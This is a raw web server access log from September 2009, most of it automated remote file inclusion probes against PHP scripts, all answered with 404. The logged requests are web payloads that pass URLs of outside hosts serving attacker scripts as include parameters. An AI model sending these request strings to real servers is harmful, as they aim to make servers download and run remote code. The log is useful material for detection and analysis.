207.210.117.174 - - [07/Sep/2009:02:23:58 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.210.117.174 - - [07/Sep/2009:02:23:58 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.210.117.174 - - [07/Sep/2009:02:23:58 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.108.252.200 - - [07/Sep/2009:02:24:06 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.108.252.200 - - [07/Sep/2009:02:24:06 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.108.252.200 - - [07/Sep/2009:02:24:06 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.210.117.174 - - [07/Sep/2009:02:24:12 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.108.252.200 - - [07/Sep/2009:02:24:27 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
213.175.195.25 - - [07/Sep/2009:02:24:55 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
213.175.195.25 - - [07/Sep/2009:02:24:55 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
213.175.195.25 - - [07/Sep/2009:02:24:55 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
213.175.195.25 - - [07/Sep/2009:02:25:07 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
213.175.195.25 - - [07/Sep/2009:02:25:28 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
213.175.195.25 - - [07/Sep/2009:02:25:28 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
213.175.195.25 - - [07/Sep/2009:02:25:28 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.228.235.194 - - [07/Sep/2009:02:25:34 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.228.235.194 - - [07/Sep/2009:02:25:34 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.228.235.194 - - [07/Sep/2009:02:25:34 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
213.175.195.25 - - [07/Sep/2009:02:25:39 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
78.109.17.146 - - [07/Sep/2009:02:25:47 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
78.109.17.146 - - [07/Sep/2009:02:25:47 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
78.109.17.146 - - [07/Sep/2009:02:25:47 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.228.235.194 - - [07/Sep/2009:02:25:50 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
78.109.17.146 - - [07/Sep/2009:02:26:03 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
78.109.17.146 - - [07/Sep/2009:02:26:09 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
78.109.17.146 - - [07/Sep/2009:02:26:09 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
78.109.17.146 - - [07/Sep/2009:02:26:09 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
78.109.17.146 - - [07/Sep/2009:02:26:22 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.228.235.194 - - [07/Sep/2009:02:26:47 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.228.235.194 - - [07/Sep/2009:02:26:47 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.228.235.194 - - [07/Sep/2009:02:26:47 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.34.46.90 - - [07/Sep/2009:02:26:51 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 327 "-""Mozilla/5.0"
66.34.46.90 - - [07/Sep/2009:02:26:51 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 300 "-""Mozilla/5.0"
66.34.46.90 - - [07/Sep/2009:02:26:51 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 305 "-""Mozilla/5.0"
66.34.46.90 - - [07/Sep/2009:02:26:57 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 305 "-""Mozilla/5.0"
66.34.46.90 - - [07/Sep/2009:02:26:57 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 300 "-""Mozilla/5.0"
66.34.46.90 - - [07/Sep/2009:02:27:01 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 327 "-""Mozilla/5.0"
67.228.235.194 - - [07/Sep/2009:02:27:04 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.34.46.90 - - [07/Sep/2009:02:27:14 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 327 "-""Mozilla/5.0"
66.34.46.90 - - [07/Sep/2009:02:27:36 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 327 "-""Mozilla/5.0"
208.77.96.146 - - [07/Sep/2009:02:27:45 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.77.96.146 - - [07/Sep/2009:02:27:45 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.77.96.146 - - [07/Sep/2009:02:27:45 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
208.77.96.146 - - [07/Sep/2009:02:28:05 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.77.96.146 - - [07/Sep/2009:02:30:44 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.77.96.146 - - [07/Sep/2009:02:30:44 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
208.77.96.146 - - [07/Sep/2009:02:30:45 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.77.96.146 - - [07/Sep/2009:02:31:07 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:02:31:08 -0500] "GET //main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:02:31:08 -0500] "GET /logs/access_log.1247788800//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:02:31:08 -0500] "GET /logs//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
117.74.98.18 - - [07/Sep/2009:02:31:15 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
117.74.98.18 - - [07/Sep/2009:02:31:15 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
117.74.98.18 - - [07/Sep/2009:02:31:15 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:02:31:46 -0500] "GET //main.php?sayfa=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:02:31:46 -0500] "GET /logs//main.php?sayfa=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:02:31:46 -0500] "GET /logs/access_log.1243036800//main.php?sayfa=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
117.74.98.18 - - [07/Sep/2009:02:31:47 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.41.197.1 - - [07/Sep/2009:02:32:00 -0500] "GET /logs/classified_right.php?language_dir=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
212.41.197.1 - - [07/Sep/2009:02:32:00 -0500] "GET /classified_right.php?language_dir=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
117.74.98.18 - - [07/Sep/2009:02:32:12 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
117.74.98.18 - - [07/Sep/2009:02:32:12 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
117.74.98.18 - - [07/Sep/2009:02:32:12 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.74.98.18 - - [07/Sep/2009:02:32:44 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.207.123 - - [07/Sep/2009:02:33:33 -0500] "GET /logs/access_log.1123286400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.110.11.75 - - [07/Sep/2009:02:35:04 -0500] "GET /logs/!scanhttp://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 359 "-""libwww-perl/5.79"
211.110.11.75 - - [07/Sep/2009:02:35:05 -0500] "GET /!scanhttp://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
80.67.26.40 - - [07/Sep/2009:02:36:22 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:02:36:25 -0500] "GET /logs/access_log.1244764800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:02:36:25 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:02:37:16 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:02:37:23 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.158 - - [07/Sep/2009:02:37:32 -0500] "GET /logs/access_log.1168214400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.67.26.40 - - [07/Sep/2009:02:38:08 -0500] "GET /logs/access_log.1244764800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:02:38:08 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:02:38:08 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.55.207.97 - - [07/Sep/2009:02:38:32 -0500] "GET /logs/access_log.1197158400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.141.56.136 - - [07/Sep/2009:02:38:51 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
218.38.136.251 - - [07/Sep/2009:02:39:32 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
62.141.56.136 - - [07/Sep/2009:02:40:38 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
62.141.56.136 - - [07/Sep/2009:02:40:38 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
62.141.56.136 - - [07/Sep/2009:02:40:38 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
62.141.56.136 - - [07/Sep/2009:02:41:32 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
222.236.47.23 - - [07/Sep/2009:02:41:56 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:02:41:56 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:02:41:56 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:02:42:03 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:02:42:03 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:02:42:03 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:02:42:29 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:02:43:51 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
62.141.56.136 - - [07/Sep/2009:02:44:28 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
62.141.56.136 - - [07/Sep/2009:02:44:28 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
199.96.29.70 - - [07/Sep/2009:02:45:18 -0500] "GET //admin/index.php?o=http://indo.home.ro/idbit??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
81.24.35.80 - - [07/Sep/2009:02:48:30 -0500] "GET /kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
81.24.35.80 - - [07/Sep/2009:02:48:30 -0500] "GET /logs/access_log.1228608000/kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
81.24.35.80 - - [07/Sep/2009:02:48:30 -0500] "GET /logs/kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.38.136.251 - - [07/Sep/2009:02:48:46 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
218.38.136.251 - - [07/Sep/2009:02:48:47 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
80.67.26.40 - - [07/Sep/2009:02:49:51 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:02:49:51 -0500] "GET /logs/access_log.1244764800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:02:49:51 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:02:50:45 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:02:50:52 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:02:51:32 -0500] "GET //components/com%A7zoom/includes/database.php?mosConfig%A7absolute%A7path=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:02:51:32 -0500] "GET /logs/access_log.1245369600//components/com%A7zoom/includes/database.php?mosConfig%A7absolute%A7path=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:02:51:33 -0500] "GET /logs//components/com%A7zoom/includes/database.php?mosConfig%A7absolute%A7path=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.24.35.80 - - [07/Sep/2009:02:52:17 -0500] "GET /logs/access_log.1236211200/kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
203.185.129.45 - - [07/Sep/2009:02:52:57 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
203.185.129.45 - - [07/Sep/2009:02:52:57 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
203.185.129.45 - - [07/Sep/2009:02:52:57 -0500] "GET /logs/access_log.1237075200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.208.123 - - [07/Sep/2009:02:53:14 -0500] "GET /logs/access_log.1231632000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [07/Sep/2009:02:53:16 -0500] "GET /logs/access_log.1199232000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [07/Sep/2009:02:53:16 -0500] "GET /logs/access_log.1124064000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [07/Sep/2009:02:53:17 -0500] "GET /logs/access_log.1178409600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [07/Sep/2009:02:53:18 -0500] "GET /logs/access_log.1218758400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [07/Sep/2009:02:53:53 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:02:53:53 -0500] "GET //include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:02:53:54 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:02:53:54 -0500] "GET /logs/access_log.1242259200//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:02:53:56 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:02:53:56 -0500] "GET //include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:02:53:56 -0500] "GET /logs/access_log.1242259200//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:02:53:57 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.24.35.80 - - [07/Sep/2009:02:56:30 -0500] "GET /logs/access_log.1236038400/kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
219.85.63.226 - - [07/Sep/2009:03:01:23 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:01:23 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:01:23 -0500] "GET /logs/access_log.1242259200//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:01:23 -0500] "GET //include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:03:04:16 -0500] "GET /logs/access_log.1244764800//guestbook1//admin.php?include_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
